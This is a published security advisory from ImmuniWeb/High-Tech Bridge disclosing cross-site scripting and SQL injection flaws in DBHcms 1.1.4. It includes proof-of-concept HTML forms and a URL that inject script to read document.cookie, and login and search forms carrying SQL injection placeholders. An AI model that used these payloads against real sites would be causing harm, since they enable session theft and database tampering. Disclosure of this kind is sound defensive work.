Total Tests:

Multiple Vulnerabilities in DBHcms

Advisory ID:HTB22453
Product:DBHcms
Vendor:Kai-Sven Bunk
Vulnerable Versions:1.1.4 and probably prior
Tested Version:1.1.4
Advisory Publication:June 21, 2010 [without technical details]
Vendor Notification:June 21, 2010
Public Disclosure:July 5, 2010
Vulnerability Type:Cross-Site Scripting [CWE-79]
SQL Injection [CWE-89]
Risk Level:High
CVSSv2 Base Scores:4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Discovered and Provided:High-Tech Bridge Security Research Lab
 

Advisory Details:

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in DBHcms which could be exploited to perform cross-site scripting and SQL injection attacks.

1) Cross-site scripting (XSS) vulnerabilities in DBHcms
1.1 The vulnerability exists due to input sanitation error in the "searchString" parameter in dbhcms/ext/search/ext.search.fe.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website.
Exploitation example:
<form action="http://example.com/index.php?dbhcms_did=1&dbhcms_pid=11&dbhcms_lang= en" method="post" name="main" >
<input type="hidden" name="dbhcmsCache" value="CT_OFF" />
<input type="hidden" name="todo" value="searchExecute" />
<input type="hidden" name="searchString" value='search"><script>alert(document.cookie)</script>' />
<input type="hidden" name="submitbtn" value=" Search " />
</form>
<script>
document.main.submit();
</script>

1.2 The vulnerability exists due to input sanitation error in the "edituser" parameter in index.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website. Successful exploitation requires that victim is logged-in into the application and has access to administrative interface.
Exploitation example:
http://example.com/index.php?dbhcms_pid=-71&edituser=2'"><script>alert(docum ent.cookie)</script>

2) SQL injection vulnerabilities in DBHcms
2.1 The vulnerability exists due to input sanitation errors in the "dbhcms_user" parameter in index.php. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary SQL commands in application`s database. Successful exploitation may allow an attacker to read, modify, add or delete arbitrary data in the database.
Exploitation example:
<form action="http://host/" method="post" name="main" >
<input type="hidden" name="dbhcms_user" value="'SQL CODE HERE" />
<input type="hidden" name="dbhcms_passwd" value="password" />
<input type="submit" value="Login" name="submit" />
</form>

2.2 The vulnerability exists due to input sanitation errors in the "searchString" parameter in index.php. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary SQL commands in application`s database. Successful exploitation may allow an attacker to read, modify, add or delete arbitrary data in the database.
Exploitation example:
<form action="http://host/index.php?dbhcms_did=1&dbhcms_pid=11&dbhcms_lang=en" method="post" name="search" />
<input name="dbhcmsCache" value="CT_OFF" type="hidden" />
<input name="todo" value="searchExecute" type="hidden" />
<input name="searchString" value="'SQL CODE HERE" type="hidden" />
<input type="submit" value="Search" name="submit" />
</form>

How to Detect Cross-Site Scripting Vulnerabilities
Website Security Test
  • GDPR & PCI DSS Test
  • Website CMS Security Test
  • CSP & HTTP Headers Check
  • WordPress & Drupal Scanning
Try For Free

Solution:
Currently we are not aware of any vendor-supplied patches or other solutions. The vendor was contacted in accordance to our Vendor Notification Policy but we didn't get any answer or feedback.


References:
[1] High-Tech Bridge Advisory HTB22453 - https://www.immuniweb.com/advisory/HTB22453 - Multiple Vulnerabilities in DBHcms
[2] DBHcms - drbenhur.com - DBHcms is a free search engine optimized open source content management system for personal and small business websites.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.

Have additional information to submit?
Please feel free to send us any additional information related to this Advisory, such as vulnerable versions, additional exploitation details and conditions, patches and other relevant details.
Book a Call Ask a Question
Close
Talk to ImmuniWeb Experts
ImmuniWeb AI Platform
Have a technical question?

Our security experts will answer within
one business day. No obligations.

Have a sales question?
Email:
Tel: +41 22 560 6800 (Switzerland)
Tel: +1 720 605 9147 (USA)
*
*
*
Your data will stay private and confidential